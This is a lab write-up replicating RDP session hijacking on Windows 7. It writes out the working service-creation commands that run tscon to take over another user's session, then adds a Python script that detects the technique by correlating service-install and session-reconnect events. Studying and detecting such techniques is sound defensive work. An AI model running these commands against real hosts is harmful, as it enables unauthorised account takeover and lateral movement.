RDP Session Hijacking using tscon

I read Kevin Beaumont's RDP Session Hijacking article on Medium and was amazed at how it worked, so I decided to replicate it.

For more information about RDP hijacking, please check Kevin Beaumont's article (https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6).

The Setup:
Two virtual machines, both running Windows 7:

Attacker Machine

Target Machine

In this scenario, I already have an administrator account named "blade" on the target machine. The goal is to hijack the session of "superAdmin", who is currently logged on to the target machine.

First, I RDP to the target machine using the administrator account "blade".

Using the command "query user", I checked which users are logged on.

On the target machine, I created a service that will hijack the session of "superadmin":

sc create rdphijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"

Notes:
The number passed to tscon (here 1) is the session ID of superadmin, as listed by "query user".
The "/dest" value is the SessionName of the RDP session I am connected with as "blade". In this scenario the SessionName is "rdp-tcp#0".

Lastly, I started the service I created using the command "net start rdphijack" and successfully obtained an RDP session as the "superadmin" account.

net start rdphijack
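
From the defender's side, the two steps above leave a recognisable trail: a service is installed whose command line invokes tscon, and shortly afterwards another user's session is reconnected to the attacker's window station. The following Python script is an added example (not part of the original post) of that detection logic: it scans Windows event records for a service install (System event 7045) whose ImagePath runs tscon against a session ID and correlates it with a session reconnect (Security event 4778) for the /dest session within a short window. The event records are constructed for the example; the field names follow the real events, but the flat dictionary layout is an assumption about how your log pipeline exports them.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not real logs). System 7045 = "A service was installed",
# Security 4778 = "A session was reconnected to a Window Station".
SAMPLE_EVENTS = [
    {"time": "2017-04-01T10:00:05", "log": "System", "id": 7045,
     "ServiceName": "rdphijack",
     "ImagePath": "cmd.exe /k tscon 1 /dest:rdp-tcp#0"},
    {"time": "2017-04-01T10:00:40", "log": "Security", "id": 4778,
     "AccountName": "superadmin", "SessionName": "rdp-tcp#0"},
    {"time": "2017-04-01T11:30:00", "log": "System", "id": 7045,
     "ServiceName": "Backup", "ImagePath": r"C:\Program Files\Backup\svc.exe"},
    {"time": "2017-04-01T12:00:00", "log": "Security", "id": 4778,
     "AccountName": "alice", "SessionName": "rdp-tcp#1"},
]

# tscon (or tscon.exe, possibly with a path) followed by a numeric session id
TSCON_RE = re.compile(r"(?:^|[\\\s\"'])tscon(?:\.exe)?\s+\d+", re.IGNORECASE)

def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def find_tscon_services(events):
    """Return 7045 events whose ImagePath runs tscon against a session id."""
    return [e for e in events
            if e["id"] == 7045 and TSCON_RE.search(e.get("ImagePath", ""))]

def correlate_reconnects(events, window=timedelta(minutes=5)):
    """Pair each suspicious service install with 4778 reconnects that follow it
    within `window` and land on the /dest session named in the ImagePath."""
    alerts = []
    for svc in find_tscon_services(events):
        m = re.search(r"/dest:(\S+)", svc["ImagePath"], re.IGNORECASE)
        dest = m.group(1).lower() if m else None
        t0 = parse_time(svc["time"])
        for e in events:
            if e["id"] != 4778:
                continue
            dt = parse_time(e["time"]) - t0
            if timedelta(0) <= dt <= window and (dest is None or e["SessionName"].lower() == dest):
                alerts.append({"service": svc["ServiceName"], "account": e["AccountName"],
                               "session": e["SessionName"], "seconds_after_install": int(dt.total_seconds())})
    return alerts

if __name__ == "__main__":
    for a in correlate_reconnects(SAMPLE_EVENTS):
        print(a)
```

The benign "Backup" service and the unrelated reconnect by "alice" are left alone; only the rdphijack install followed 35 seconds later by superadmin's session landing on rdp-tcp#0 is reported.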

Credits:

Kevin Beaumont - @gossithedog
Alexander Korznikov - @nopernik
